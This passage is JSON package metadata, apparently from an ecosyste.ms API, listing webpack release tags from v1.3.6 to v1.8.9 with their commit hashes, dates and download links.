0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.m